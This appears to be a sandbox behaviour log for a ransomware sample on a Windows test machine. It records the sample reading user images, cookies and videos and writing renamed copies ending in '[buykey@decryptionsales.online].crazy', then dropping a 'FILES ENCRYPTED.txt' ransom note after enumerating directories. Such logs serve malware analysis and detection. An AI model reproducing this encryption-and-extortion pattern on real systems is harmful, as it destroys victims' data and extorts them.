| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[1].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[1].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[3].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[3].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@demdex[1].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@demdex[1].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@everesttech[1].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@everesttech[1].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@google[2].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@google[2].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@ml314[1].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@ml314[1].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@rlcdn[2].txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\2BsHhiK_MGfHnQ8JtZCW\aYg82Cc3bcMS7.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\2BsHhiK_MGfHnQ8JtZCW\aYg82Cc3bcMS7.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\2BsHhiK_MGfHnQ8JtZCW\FcFwY-FsCx_Mt8.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\2BsHhiK_MGfHnQ8JtZCW\FcFwY-FsCx_Mt8.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\FILES ENCRYPTED.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Boot | type = file_attributes |
|
4 | |
| Get Info | C:\Config.Msi | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache | type = file_attributes |
|
4 | |
| Get Info | C:\PerfLogs | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData | type = file_attributes |
|
4 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\cs-CZ | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\da-DK | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\de-DE | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\el-GR | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\es-ES | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\fi-FI | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\Fonts | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\fr-FR | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\hu-HU | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\it-IT | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\ja-JP | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\ko-KR | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\nb-NO | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\nl-NL | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\pl-PL | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\pt-BR | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\pt-PT | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\ru-RU | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\sv-SE | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\tr-TR | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\zh-CN | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\zh-HK | type = file_attributes |
|
4 | |
| Get Info | C:\Boot\zh-TW | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users | type = file_attributes |
|
4 | |
| Get Info | C:\PerfLogs\Admin | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Desktop | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Documents | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Favorites | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft Help | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Mozilla | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Oracle | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Sun | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default User | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0043-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0044-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0054-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-00A1-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-00B4-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-00BA-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0117-0409-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{91140000-0011-0000-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{91140000-003B-0000-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{91140000-0057-0000-1000-0000000FF1CE}-C | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\Acrobat | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\ARM | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Assistance | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\DeviceSync | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\DRM | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\eHome | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Event Viewer | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\IdentityCRL | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Media Player | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\MF | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\MSDN | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\NetFramework | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Network | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OFFICE | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\RAC | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Search | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\User Account Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Vault | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\VISIO | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\WwanSvc | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Mozilla\logs | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Sun\Java | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Contacts | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Cookies | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Downloads | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Favorites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Links | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Local Settings | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\My Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\NetHood | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\PrintHood | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Recent | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Searches | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\SendTo | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Videos | type = file_attributes |
|
4 | |
